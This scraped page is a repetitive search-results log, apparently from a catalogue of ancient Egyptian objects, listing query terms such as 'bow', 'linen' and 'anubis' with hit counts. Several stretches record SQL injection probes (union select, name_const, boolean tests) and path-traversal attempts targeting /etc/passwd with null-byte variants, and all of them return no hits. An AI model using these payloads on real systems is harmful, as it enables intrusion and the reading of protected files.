(hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for mask - (hits/occ.: 1)Results List for seal - (hits/occ.: 16)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for mask - (hits/occ.: 1)Results List for glove - (hits/occ.: 10)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for glove - (hits/occ.: 10)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for seal - (hits/occ.: 16)Results List for arrow - (hits/occ.: 29)Results List for wreath - (hits/occ.: 1)Results List for garland - (hits/occ.: 2)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for loin - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for anubis2121121121212.1 - (hits/occ.: 0)Results List for anubis%20and%201%3d1 - (hits/occ.: 0)Results List for anubis%20and%201%3e1 - (hits/occ.: 0)Results List for anubis%27%20and%20%27x%27%3d%27x - (hits/occ.: 0)Results List for anubis%27%20and%20%27x%27%3d%27y - (hits/occ.: 0)Results List for anubis%20and%20x%3dx - (hits/occ.: 0)Results List for anubis%22%20and%20%22x%22%3d%22y - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for anubis999999.1%20union%20select%20unhex(hex(version()))%20--%20and%201%3d1 - (hits/occ.: 0)Results List for %27x - (hits/occ.: 0)Results List for %22x - (hits/occ.: 0)Results List for (select*from(select%20name_const(char(111,108,111,108,111,115,104,101,114),1),name_const(char(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3d1 - (hits/occ.: 0)Results List for (select*from(select%20name_const(char(111,108,111,108,111,115,104,101,114),1),name_const(char(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x - (hits/occ.: 0)Results List for (select*from(select%20name_const(char(111,108,111,108,111,115,104,101,114),1),name_const(char(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for garland - (hits/occ.: 2)Results List for wreath - (hits/occ.: 1)Results List for seal - (hits/occ.: 16)Results List for 0 - (hits/occ.: 32)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for mask - (hits/occ.: 1)Results List for seal - (hits/occ.: 16)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for mask - (hits/occ.: 1)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for glove - (hits/occ.: 10)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for %20and%201%3d1 - (hits/occ.: 0)Results List for %20and%201%3e1 - (hits/occ.: 0)Results List for %27%20and%20%27x%27%3d%27x - (hits/occ.: 0)Results List for %27%20and%20%27x%27%3d%27y - (hits/occ.: 0)Results List for %20and%20x%3dx - (hits/occ.: 0)Results List for %22%20and%20%22x%22%3d%22y - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for (select*from(select%20name_const(char(111,108,111,108,111,115,104,101,114),1),name_const(char(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3d1 - (hits/occ.: 0)Results List for (select*from(select%20name_const(char(111,108,111,108,111,115,104,101,114),1),name_const(char(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x - (hits/occ.: 0)Results List for (select*from(select%20name_const(char(111,108,111,108,111,115,104,101,114),1),name_const(char(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x - (hits/occ.: 0)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for 1 - (hits/occ.: 145)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for seal - (hits/occ.: 16)Results List for loin - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for glass - (hits/occ.: 28)Results List for garland - (hits/occ.: 2)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for glass - (hits/occ.: 28)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for garland - (hits/occ.: 2)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for glass - (hits/occ.: 28)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for garland - (hits/occ.: 2)Results List for seal - (hits/occ.: 16)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for shield - (hits/occ.: 8)Results List for glass - (hits/occ.: 28)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for mask - (hits/occ.: 1)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for seal - (hits/occ.: 16)Results List for mask - (hits/occ.: 1)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for arrow'[0] - (hits/occ.: 0)Results List for /etc/passwd - (hits/occ.: 0)Results List for %2fetc%2fpasswd - (hits/occ.: 0)Results List for /etc/passwd%00 - (hits/occ.: 0)Results List for %2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../etc/passwd - (hits/occ.: 0)Results List for ..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../../../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../../../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../../../../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../../../../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../../../../../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../../../../../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../../../../../../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../../../../../../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../../../../../../../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../../../../../../../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for garland - (hits/occ.: 2)Results List for - (hits/occ.: 0)Results List for garland - (hits/occ.: 2)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for garland - (hits/occ.: 2)Results List for arrow - (hits/occ.: 29)Results List for garland - (hits/occ.: 2)Results List for garland - (hits/occ.: 2)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for - 